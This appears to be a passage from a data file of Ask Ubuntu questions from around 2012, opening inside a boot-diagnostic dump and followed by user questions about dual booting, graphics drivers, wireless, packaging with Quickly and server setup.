/boot/vmlinuz-3.2.0-23-generic root=uuid=9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-23-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt6 ) ' search -- no-floppy -- fs-uuid -- set=root 9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt6 ) ' search -- no-floppy -- fs-uuid -- set=root 9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda3 ) '' -- class windows -- class os { insmod part_gpt insmod ntfs set root= ' ( hd0 , gpt3 ) ' search -- no-floppy -- fs-uuid -- set=root 0eec3e6eec3e5067 chainloader +1 } menuentry `` windows recovery environment ( loader ) ( on /dev/sda5 ) '' -- class windows -- class os { insmod part_gpt insmod ntfs set root= ' ( hd0 , gpt5 ) ' search -- no-floppy -- fs-uuid -- set=root b6ba44f7ba44b621 drivemap -s ( hd0 ) $ { root } chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . menuentry `` windows x86_64 uefi-gpt '' { search -- fs-uuid -- no-floppy -- set=root 885c-ed1b chainloader ( $ { root } /efi/boot/bootx64.fi } # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda6/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda1 during installation uuid=a444-e7db /boot/efi vfat defaults 0 1 # swap was on /dev/sda7 during installation uuid=f0e890f9-acd1-4ee0-89b7-d2f1d0525247 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda6 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = boot/grub/grub.cfg 1 = boot/initrd.img-3.2.0-23-generic 2 = boot/initrd.img-3.2.0-26-generic 2 = boot/vmlinuz-3.2.0-23-generic 1 = boot/vmlinuz-3.2.0-26-generic 1 = initrd.img 2 = initrd.img.old 2 = vmlinuz 1 = vmlinuz.old 1 ======================== unknown mbrs/boot sectors/etc : ======================== unknown gpt partiton type 5850cbb887c11947baf0379ca2d4c97e unknown gpt partiton type dee2bfd3af3ddf11ba40e3a556d89593 ========= devices which do n't seem to have a corresponding hard drive : ========= sdc =============================== stderr messages : =============================== awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in i am having the problem where i ca n't boot windows from the grub menu . i get the error : invalid efi path on startup when i select my windows boot . i have an asus ux31vd . any suggestions as to how i can get around this ? i suck with boot configs .
160874	can i use 'axel ' or 'aria2 ' to continue an interrupted 'wget ' download ?	i was downloading a big file with wget , but the speed was very slow . how can i continue downloading this file with axel or aria2 ?
160880	quickly app not starting	i 'm creating a web-browser named `` surf 's up ! `` , and i have programmed the code and the interface , but when i try to run the app , an error message appears : traceback ( most recent call last ) : file `` bin/surfs-up '' , line 32 , in < module > import surfs_up file `` /home/owner/surfs-up/surfs_up/__init__.py '' , line 14 , in < module > from surfs_up import surfsupwindow file `` /home/owner/surfs-up/surfs_up/surfsupwindow.py '' , line 10 , in < module > from gi.repository import gtk , webkit # pylint : disable=e0611 file `` /usr/lib/python2.7/dist-packages/gi/importer.py '' , line 76 , in load_module dynamic_module._load ( ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 222 , in _load version ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 90 , in __init__ repository.require ( namespace , version ) gi.repositoryerror : requiring namespace 'gtk ' version '2.0 ' , but '3.0 ' is already loaded the code is as follows : # -*- mode : python ; coding : utf-8 ; indent-tabs-mode : nil ; tab-width : 4 -*- # # # begin license # this file is in the public domain # # # end license import gettext from gettext import gettext as _ gettext.textdomain ( 'surfs-up ' ) from gi.repository import gtk , webkit # pylint : disable=e0611 import logging logger = logging.getlogger ( 'surfs_up ' ) from surfs_up_lib import window from surfs_up.aboutsurfsupdialog import aboutsurfsupdialog from surfs_up.preferencessurfsupdialog import preferencessurfsupdialog # see surfs_up_lib.window.py for more details about how this class works class surfsupwindow ( window ) : __gtype_name__ = `` surfsupwindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( surfsupwindow , self ) .finish_initializing ( builder ) self.aboutdialog = aboutsurfsupdialog self.preferencesdialog = preferencessurfsupdialog # code for other initialization actions should be added here . self.refresh = self.builder.get_object ( `` refresh '' ) self.urltext = self.builder.get_object ( `` urltext '' ) self.scroll = self.builder.get_object ( `` scroll '' ) self.toolbar = self.builder.get_object ( `` toolbar '' ) context = self.toolbar.get_style_context ( ) context.add_class ( gtk.style_class_primary_toolbar ) self.webview = webkit.webview ( ) self.scroll.add ( self.webview ) self.webview.show ( ) def on_refresh_clicked ( self , widget ) : print `` refreshing page ... ... ... ... ... ... ... ... ... ... ... . '' self.webview.reload ( ) def on_urltext_activate ( self , widget ) : url = widget.get_text ( ) print url self.webview.open ( url ) what do i need to fix to resolve the situation ?
160882	popping noise from laptop speakers	recently the speakers have suddenly started to make popping noises every few seconds , although it can pause for irregular amounts of time . the sound is like that of when you plug/unplug headphones from a socket . i have tried blowing in the headphone socket but with no outcome . this seemed to come from nowhere as i have n't kept my laptop in a dusty/dirty place recently or had any software changes . any suggestions on how to fix this would be greatly appreciated , thanks in advance , ross
160892	why are both old and new optical drives not detected in ubuntu or in windows ?	i 'm running 12.04lts . so i asked this same question on the ubuntuforums and was recommended to get a new drive . i 've done that and still have the same problem . here 's the original ( http : //ubuntuforums.org/showthread.php ? p=11981491 ) : hi there . so , let me preface this by saying that the drive in question was working . i used it to install 11.10 before upgrading to 12.04 . i also used it to install the win7 dual boot partition . i 'm running 12.04 64bit . the drive is a samsung sh-222 . i can no longer access the drive in windows or ubuntu and i ca n't even use bootable cd/dvd even though it appears in my bios launch options . the drive is receiving power and opens , but if a disc is loaded i get no response ( in either os ) . here 's fstab - quote : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=8f568673-81d3-40f0-aade-3f77fb65b151 / ext4 errors=remount-ro 0 1 # /windows was on /dev/sda4 during installation uuid=79753e43529b03b9 /windows ntfs defaults , umask=007 , gid=46 0 0 # swap was on /dev/sda5 during installation uuid=4d558b02-e348-4010-bbce-8a5ff8130c8a none swap sw 0 0 here 's lspci ... 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation h61 express chipset family lpc controller ( rev 05 ) 00:1f.2 ide interface : intel corporation 6 series/c200 series chipset family 4 port sata ide controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 00:1f.5 ide interface : intel corporation 6 series/c200 series chipset family 2 port sata ide controller ( rev 05 ) 02:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 ) my main hdd is also sata and is being read fine . i 'm at a loss of why this is happening , not just in ubuntu , but system wide . help would be greatly appreciated . this may have happened a week ago or a month ago , i 'm really not sure . i so rarely use the dvd drive that i have n't had any reason to try , so i ca n't really pinpoint where/when it stopped working , sorry . if you need any additional information , i 'll be more than happy to give it . thanks in advance . so now , i have installed a brand new drive ( same make/model ) and am having the same outcome . here 's the new lspci : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation h61 express chipset family lpc controller ( rev 05 ) 00:1f.2 ide interface : intel corporation 6 series/c200 series chipset family 4 port sata ide controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 00:1f.5 ide interface : intel corporation 6 series/c200 series chipset family 2 port sata ide controller ( rev 05 ) 02:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 ) any help or ideas would be greatly appreciated .
160896	ubuntu 64-bit 12.04 installation dvd boot problem blank screen	i get blank screen when trying to install ubuntustudio 64-bit dvd ( i tried to install from dvd not usb stick ) . when using nosplash and no quiet i see that it hangs when it tries to load the nouveau driver for my geforce gt 630 so it looks like there is a problem with support for my graphics card . after installation , i tried to install the binary nvidia current driver from package manager , but then , i just get a text terminal after rebooting . any solution ?
160897	how do i search for available packages from the command-line ?	i have successfully installed some packages using the command line 'sudo apt-get install ... ' when i have known in advance that those packages are available . but how can i search for or get a list of what is available in the repositories ?
160902	can i have a computer with 2 physical hds , & dual boot option , one for windows & one for ubuntu	what i would like to do is buy 2 hds . then i can have one formatted for ubuntu 12.04 and install windows xp pro sp1 on the other hd for which i have the original installation cd . then i would like to have a dual boot option so that when i power up the computer , i can choose whether to use windows xp or ubuntu . is this possible ? if so , how would i do it , that is , arrange it so a dual boot option presents itself on power up .
160904	overlay scrollbars disabled on upgrade - how to reenable ?	when i upgraded from natty to oneiric and then immediately to precise , for some reason the overlay scrollbars stopped appearing . they were enabled and worked just fine in natty , and are still enabled in theory . i 've purged and reinstalled these packages : overlay-scrollbar , liboverlay-scrollbar-0.2-0 , and liboverlay-scrollbar3-0.2-0 . that did nothing . i also tried using both ubuntu tweak and unsettings , but both showed that overlay scrollbars were turned on ( and turning the settings off and back on again did nothing either ) . any ideas how to get them back ? thanks ! edit : i just read that some people disable them by adding a line in ~/.xprofile or /etc/x11/xsession.d/99disable-overlay-scrollbars , but those files do n't exist .
160908	installing ubuntu studio	i 'm trying to install ubuntu studio via usb stick . i follow all the instructions and the usb drive says ubuntu studio , but ubuntu desktop without the studio installs .
160910	`` unexpected error : invalid byte sequence in conversion input '' in gedit	i have a text file . i created the content of the text file by copying from some webpage into it . during the creation , i was completely under gedit . i then saved the file and exited gedit . but since then , i have n't been able to open the file in gedit ( although i could open it in emacs ) . i tried to open it in gedit , but fails because `` unexpected error : invalid byte sequence in conversion input '' . how shall i open such a file successfully , if without changing the content of the file ? i guess there are some `` bad '' characters in it , and want to see what they are and remove them if they are not important . how shall i identify those culprit characters ? thanks !
160911	what would be a good opensource software for graphing circles , circular regions , and regions bounded by curves and/or arcs ?	hullo all . i have just started s job with chegg , and my 1st assignment has me writign solutions for stewart 's essential calculus . i am dealing with the chapter on multiple integration , and need a good open-source software that i can easily use to draw regions ( domains ) that would require multiple integrals : i.e . circular regions , portions of circles , regions bounded by curves and/or arcs , and at some point 3d pictures . in most of these cases , i am not working with an exact equation or perhaps need to draw the region bounded by r ( radius ) between 1 and 2 , and the angle theta bounded between pi/4 and 3 pi/4 . i am not too terribly familiar with programs like corel draw , but the documents i have from this company suggest corel draw . so i think i am looking for an open-source free program like corel draw or something similar . any additional suggestions would also be appreciated . i know i can do most , if not all of this using tikz , but the learning curve is a bit steep , and at the moment i an on a time constraint . thanks .
160916	help download and install and save and use my wireless stick modem and software	i installed linux ( ubuntu ) after my windows operating system went totally dead with a fatal blue screen . i could not reboot or install form cd rom or get safe mode . now that i 've installed ubuntu , i am still unable to install my wireless stick usb modem to connect and surf the internet via provider . i 'm using a wireless network from the neighborhood right now . i find it difficult to download and install and save programs and applications from the internet , including skype and real player . ubuntu is different form windows and not that easy to use . i click to download for example and find real player but when click on it it opens as a text file only and i can not use it as it should be used for video and download and record from youtube . how can i do this ? and does ubuntu have a similar program to those available for windows , to download/record youtube videos ? is there any trick to recover my windows operating system ? can i use linux to recovery the broken windows system ? can i import my files from the broken windows 7 system that always bluescreens ?
160917	ubuntu installer asks if i want to install ubuntu into windows , but that 's not what i want !	the ubuntu installer gives 3 options . install ubuntu into windows . erase everything and install ubuntu . manually install ubuntu . what happened to the `` resize the windows partition and setup a dual boot box '' option i remember from the last time i installed ubuntu ?
160918	clicking links in pdfs opened with okular opens abiword ( instead of the default browser )	i work with xubuntu 12.04 and use okular ( version 0.14.3 ) to view pdf files . if i click a web link in a pdf file ( created with `` pdflatex '' using the `` hyperref '' package ) , `` abiword '' ( it 's a word-processing software , like libreoffice writer ) is opened instead of my default browser google-chrome . how can i change this behavior ? the settings in okular do not seem to provide a solution . ( note that i set google-chrome as the preferred application for web browsing under settings - > preferred applications , so that 's not the problem ) .
160921	ubuntu 12.04 running faster than normal	i have just installed a new copy of ubuntu 12.04 on my laptop . i have noticed that my system is running 4x to 5x faster than normal . i have just install vmware desktop & centos for testing something . i have noticed that i has installed in just like less than 1 minute ! ! my system is booting so fast that after starting my laptop i got gui in like 10 to 13 sec & shutting down in like 2 to 3 sec & all programs ( firefox , chrome , etc ) running so fast that i can see ... . the only change i made after installation is cat /proc/sys/vm/swappiness 1 how do i configure swappiness ? the system is dell n 5110 i7 with 8gb of ram so my question is that what should i look for that why my system running very fast ?
160922	is there a way to run an update and upgrade in one command ?	so , is it possible to update and upgrade without running : sudo aptitude update & & sudo aptitude upgrade meaning , is there one command that can do both ?
160924	why does quickly keep submitting to the wrong ppa ?	i am trying to upload my application for ubuntu app showdown and i have built it with quickly package -- extras , however when i run quickly submit ubuntu i get an email telling me the package was rejected because it was trying to upload to an older ppa i deleted months ago . i can upload the source to the right area with dput , but obviously i need a built deb package . this is starting to stress me out somewhat because i have been fighting this for over a day or more now . any help is greatly appreciated , i understand quickly is supposed to do a lot of the grunt work for me so it 's getting frustrating not knowing what 's going on . thanks , neil
160930	which jvm do i have ?	i have heard that some jvms are significantly faster than others . especially hotspot is told to be very fast . but which jvm do i already use ? $ java -version java version `` 1.6.0_20 '' openjdk runtime environment ( icedtea6 1.9.13 ) ( 6b20-1.9.13-0ubuntu1~10.04.1 ) openjdk server vm ( build 19.0-b09 , mixed mode ) which jvm get used in the free official download ?
160931	get folder from file chooser button pygtk	i want to get the location of the folder that is selected by a filechooserbutton in pygtk ... how can i do this ? i connect the current folder changed signal from filechooser but the signal is emitted twice so i get the name of the folder twice ... i do n't know what signal to connect ... can i do something with properties ? any idea will be usefull ... : )
160932	text in ubuntu software center is unreadable	when i do a search in the software center this is what the results look like . i can only see the text if i select one of them . i tried changing themes but that did n't fix it .
160934	ubuntu and lubuntu cpu usage during flash	i have been using the ubuntu based linux systems for about 2 weeks i switched to lubuntu 12.04 on the recommendation that my machine would be more capable for handling it . however this is not the case , my cpu runs at or near 100 % consistently when playing online flash games . the game has no support for lightspark or gnash , so i need to know what can i do to decrease the cpu usage and increase the flash quality , its not a video , its a game and there is no offline version . also this is a desktop emcahines t2692 i845g intel graphics extreme 3d graphics controller , running 2 or 4 gb ddr ram , either way the ram should not matter as a laptop i had running windows vista had less than 1 gb of ram and output flash just fine .
160938	after upgrade wifi icon missing	i am using ubuntu 12.04 ( did n't really want to , was perfectly happy on 10.10 , but got tired of the constant warning that my distribution was no longer supported ) . after a recent install of updates the wifi icon on the top tool bar is missing . i need it back because ubuntu keeps connecting to the wrong network and i can not change it .
160944	installing ubuntu along with windows 7 on shrunk partition	i am new to ubuntu os and ask ubuntu community . first this is not a duplicate question . actually this a question which is a summery of all solutions and questions were posted in this community , related to install ubuntu along with windows 7 . i have bought a new hp laptop with its original windows 7.i want to install ubuntu along with windows 7 64 bit . i ran the ubuntu 12.4 desktop installation cd . but ubuntu installer does n't show the `` along with windows 7 option '' only it is showing two options . i read some questions and answers posted on this community . specially following link ubuntu 12.04 does not see windows already install on my computer ( dual installation ) i tried following thinks , i ran the terminal in live cd and tried sudo dmraid -re command and dmraid remove command .but terminals says there is no dmraid partitions . so i tried another scenario checked my partitions with g parted.there are some partitions labeled c , hp tools , recovery and system . c is containing windows 7 files . so i shrank the volume of c drive . now i have 50000mb of unallocated disk . i tried with gparted to create a partition on that allocated space.it says some thing that you ca n't create more than four primary partition.of course all other four partitions were created on widows are actually type of primary partition . so i went back to windows 7 and tried to create a new volume on unallocated space.but unfortunately it says , if i create a new volume it will be the type of dynamic partition.it says we cant boot another os from that partition . so i cancelled that step . now i have 50000mb unallocated space but how can i install ubuntu on that partition without harming the existing windows 7 ? because still i have only two options : erase and install ubuntu . try something else . ( i can see my unallocated space by going to `` something else '' option . )
160945	is there a way to disable a laptop 's internal keyboard ?	a week ago , i spilt the contents of my cup onto my laptop keyboard . half of the keys no longer work , except one ! the letter q which is very active regularly . this is very disturbing as i work . is there a way to disable the internal keyboard of a laptop ? is it possible with xmodmap ?
160946	mdadm config file	so i 've asked a few similiar questions before , but my raid continues to break . im not sure whats going on . i really need to redo the whole thing . right now , my /dev/md127 is `` inactive '' in the steps i have found in attempts to activate it , i am getting a message stating that : '' /dev/md127 not identified in config file '' i 've tried to search a bit , but i 'm not confident i have found anything to proceed . can someone please help me get this raid going ? thank you so much .
160947	why is n't the mysql extension loading ?	please help ! i 've been going at it for a while and i ca n't get it to install , keep getting the ol message below . running on my own server . mysql , php , apache instaled . already uncommented the extension in my php.ini . the module is installed and can see the mysql.so file . already ran phpinfo ( ) http : //guerraysaenz.us/test.php your php installation appears to be missing the mysql extension which is required by wordpress . apache error log : php warning : module 'pdo_mysql ' already loaded in unknown on line 0 [ sat jul 07 11:59:23 2012 ] [ notice ] apache/2.2.22 ( ubuntu ) dav/2 svn/1.6.17 mod_fcgid/2.3.6 php/5.3.10-1ubuntu3.2 with suhosin-patch mod_ruby/1.2.6 ruby/1.8.7 ( 2011-06-30 ) mod_ssl/2.2.22 openssl/1.0.1 configured -- resuming normal operations php warning : php startup : unable to load dynamic library '/usr/lib/php5/20090626/modulename.extension ' - /usr/lib/php5/20090626/modulename.extension : can not open shared object file : no such file or directory in unknown on line 0 php warning : php startup : unable to load dynamic library '/usr/lib/php5/20090626/pdo_sqlite.so ' - /usr/lib/php5/20090626/pdo_sqlite.so : can not open shared object file : no such file or directory in unknown on line 0 php warning : php startup : unable to load dynamic library '/usr/lib/php5/20090626/msql.so ' - /usr/lib/php5/20090626/msql.so : can not open shared object file : no such file or directory in unknown on line 0 php warning : module 'pdo ' already loaded in unknown on line 0 php warning : module 'pdo_mysql ' already loaded in unknown on line 0
160954	error /usr/lib/i386-linux-gnu/colord/colord what does this mean ?	running 12.04 , just turned on my laptop and got this error message , and i have no idea what this means or if there 's a fix ? is this something i should be worried about ? thanks for any help in advance . `` sorry ubuntu 12.04 has experienced an internal error . /usr/lib/i386-linux-gnu/colord/colord ''
160958	how come winx dvd ripper software does n't work ?	i try opening winx dvd ripper and a couple other programs in ubuntu 12.04 and once i select/click on the program i get sent to my desktop and nothing happens at all . i replaced windows 7 with ubuntu 12.04 and removed any and all microsoft files i could find on my system . is that possibly the reason i can not run these programs ?
160962	how to set application name when creating .deb , using quickly	when i open created .deb package , my application name is unknown . please help , how to fix it ...
160963	dual boot installing ubuntu 12.04 with windows 7 ( 64 ) on a non uefi system	i can not seem to install the correct boot loader for a non-uefi firmware system . i 'm trying to install ubuntu 12.04 and windows 7 ( 64 ) which are technically compatible with gpt but for windows only if the firmware is uefi enabled . my system uses the old bios system and does not support uefi . therefore , whenever i finish my ubuntu install and try to install windows i get a `` can not install to gpt partition type '' error . even if i use gparted to format a special ntfs file format for windows it ca n't handle the gpt partition style because it does n't have uefi . but my ubuntu install always forces gpt during installation and never asks if i want to install the old bios style mbr instead . how do i resolve this ? both os 's will install fine on their own the problem is when i try to install the second os it does n't recognize any of the other 's partitions and tries to rewrite it 's own on top of the other . i 've tried both os 's first and always run into the same problem . since there is no way to make windows recognize gpt without upgrading my motherboard how do i tell ubuntu to use the old bios mbr on install ? do i have to download a special ubuntu with a specific grub version ? or should i manaually configure my partition somehow to force it not to use gpt ? thank you ,
160971	ca n't generate thumbnails in nautilus	before i upgraded to ubuntu 12.04 , thumbnails on video files worked nicely , after the upgrade , thumbnails are n't generating on video files and only on video files , most of them are .mkv files . i have some .pdf files and they all have thumbnails . i have tried to clear the thumb cache , but no luck .
160972	win 7 to usb key installer error - why do i get an error from 7-zip ?	sorry if this is a repeat question , i 've looked around the site/forum ( s ) and could n't find the answer i 'm looking for . i 'm currently running windows 7 ultimate 32-bit and i dl'ed the iso for ubuntu 12.04 desktop from this site , as well as the usb creator indicated here on www.pendrivelinux.com which is version 1.9.0.3 and while it 's running after a few minutes i get an error from the 7-zip diagnostic window indicating a `` data error in `` { relative file directory } '' . file is broken . '' and i click `` close '' to let it continue then it goes back to the usb creator app saying `` installation done , process is complete ! '' . when i look in the usb stick it says wubi.exe is 0kb . so i tried booting from usb and i get `` boot error '' message at the dos screen . is there something i 'm doing incorrectly when prepping the usb stick ?
160975	graphic driver support for z77 chipset	i just bought a shuttle pc ( type : sz77r5 ) with a intel z77 chipset . the graphic device is integrated on the motherboard and i installed ubuntu 12.04 and the grahpic quality is really bad . i can adjust my screen resolution to maximum of 1024 x 768 . i found this question but it looks like i did not really help for me . i have upgraded the linux kernel to : linux kees-spc 3.3.7-999-optimus and installed mesa-utils , but i does n't change anything . in the hardware details screen i see 'intel速 ivybridge desktop ' is shown as grahpic driver . could anyone give me a advise our tell what i should do ? tnx !
160977	11.04 , 11.10 , 12.04 wo n't boot under amd fx-6100 with nvidia geforce card	last night i tried to upgrade from ubuntu 11.10 to 12.04 . the upgrade process had numerous errors , but i let it continue assuming that it would safer than interrupting it . near the end , two conflicting messages appeared : `` too many errors '' and there was also a message telling me that the system was upgraded nonetheless . the only option i was presented at that point was to reboot , which i did , but the reboot just hanged . then i tried to boot under `` recovery mode '' but the system gets into an infinite loop with the message . so i tried to re install from 10.10 , which went ok , including updates . then i upgraded to 11.04 ( which i had done before ) and the system fails to reboot after the update . cpu : amd fx-6100 zambezi 3.3ghz socket am3+ 95w six-core mobo : asus m5a97 am3+ with bios version = 1208 , which is the most updated as of 2012.05.25 video card : evga 01g-p3-1556-kr geforce gtx 550 ti is there a compatibility problem caused by having an nvidia geforce graphics card with an amd cpu ?
160990	how to use encypted home directory after reinstallation	i reinstalled ubuntu on a machine with encrypted home directories . after that installation i have edited the fstab to boot the old home partition in /home . after doing so i can not login anymore with ldm . if i type my password , witch is the same as before , after a short moment of activity i am referred back to login page . i think this is due to the fact , that my home directory is not decrypted correctly . but i read here that this should work . what am i supposed to do ?
160999	how do i use/bundle a custom version of zenity in my script ?	i 'm writing a script using zenity . but zenity 3.4.0 has a bug ( has been fixed in latest ubuntu versions ) , it returns exit code 139 instead of 0 or 1 . but i need to use it in scenarios where the bug is still there . so the solution is to bundle a custom zenity executable . but how can i override the zenity command with my custom one in the script ?
161001	how to use static ip with wicd wireless ?	after constant problems with network manager , i switched to wicd which works better . i found some related questions ( like this one : how to specify dns ip in wicd ? - but it is for wired , not wireless ) . wicd does not seem to have a place to set static ip forr wireless . how to use static ip with wicd wireless ? ubuntu 11.04 . wicd 1.7.0
161004	how do i upgrade 'wicd ' to the latest version ?	tried sudo apt-get upgrade wicd , but it gave an error : http : //dl.google.com/linux/chrome ... 404 not found why is it looking for google chrome ? ? ? how to upgrade wicd to latest version ? also tried the software center . there is a remove button for wicd but no upgrade button .
161005	get position of launcher item in python	i 'm writing an app where i want a small window to open next to its launcher item . i can have it open at the mouse position ( which will be near the launcher ) , but that is n't very precise or satisfying . how can i get the screen position of a launcher icon using python so i can set my gtk.window position ? thanks !
161010	exporting .blend files using ogrexml	my question is a simple one this time : how can i export .blend files using ogrexml in ubuntu 12.04 ( x64 ) ? i 've installed blender-ogrexml , but how do i get it to work , or am i doing it completely wrong ?
161013	ougoing telnet : unable to connect to remote host : connection refused	i am trying to telnet from ubuntu server ( running maverick ) on ec2 to another machine i have set up not on ec2 - we 'll call it `` server-x '' . server-x is running an imap server and i am trying to test connectivity to it . the two machines are connected via vpn . i can ping from the ec2 machine to server-x no problem . on another machine also on the vpn but also not on ec2 i can telnet to server-x without issue so it is accepting incoming connections on that port . but when i run telnet from the ubuntu instance to server-x i get : ubuntu @ ip-10-111-11-11 : ~ $ telnet 5.1.1.1 9143 trying 5.1.1.1 ... telnet : unable to connect to remote host : connection refused other telnets work like this : ubuntu @ ip-10-111-11-11 : ~ $ telnet imap.gmail.com 993 trying 173.194.76.108 ... connected to gmail-imap.l.google.com . escape character is '^ ] ' . i have disabled ufw on the ubuntu machine . is there anything else that can be blocking this outgoing connection ? i tried adding the outgoing port to iptables but i 'm not certain i 'm doing that right . update : the service running on server-x is an imap server . when i changed it to use the traditional imap port 143 - the ubuntu machine can now telnet without problem . why can it not telnet out on 9143 ? i 'm pretty sure 9143 is open and listening on server-x , when i run netstat : netstat -an |grep 9143 tcp46 0 0 *.9143 * . * listen tcp4 0 0 *.9143 * . * listen
161021	why wo n't my computer update ?	my computer messed up after about 10 minutes of the new update . now when i try to update it , it says to do a partial update . when i press on this , it still does n't work . also , all the typing is to the point where i can barely read it and i can not view any pictures . what do i do ? ?
161028	how do i set up ftp on localhost ?	on my old machine ( back on lucid ! ) i used xampp for local dev work . xampp installed everything for you , including setting up ftp to your localhost ( /var/www ) directory , since permissions do n't allow you to write directly to it . i have a new machine running precise , and decided to do things the grown-up way . i installed everything using tasksel , and got apache , php , mysql , and phpmyadmin up and running . but it 's kind of a pain to have to create and edit all my files via gksudo gedit on the command line , and sooner or later i 'm going to have to upload images . how can i set up ftp so that i can `` upload '' files to my localhost server ? edit to add followed the first video , but when i got to the point where he was creating files ( around 7:25 in ) , i get hung up . here 's what my terminal looks like when i try to get into the /srv directory ( which i verified does exist in nautilus ) : what do i need to do to get past this ?
161029	how do i remove non-functional links from the dash ?	i have dead ( non-functional ) links in my dash , how do i manually remove them ? they were created by an installation of a java program via bash script . here is the script ( if it helps ) : minecraft
161030	ubuntu boot is slower than windows 7	one of the reasons i installed ubuntu ( wubi installer ) was for a supposedly quick boot time . my boot time with windows 7 is about 20-25 seconds , while my boot with ubuntu is 30-40 . i judged the boot times from the time after i selected the operating system on the initial selection menu and the grub menu , respectively . this is even after following all sorts of online guides to improve it . i 've done driver profiling ( and yes , i remembered to remove the `` profile '' edit in the grub file afterwards ) , i 've cut a fair few startup programs out , and i 've installed the preload package . but i 'm still getting startup rates phenomenally slower than windows 7 . any help here ?
161032	when i want to shutdown ubuntu appear a pop up notification	when i want to shutdown ubuntu appear a pop up asking : are you sure you want to close all programs and shut down the computer ? i run the command top in the terminal and aparently there are n't any programs running . any suggestions ?
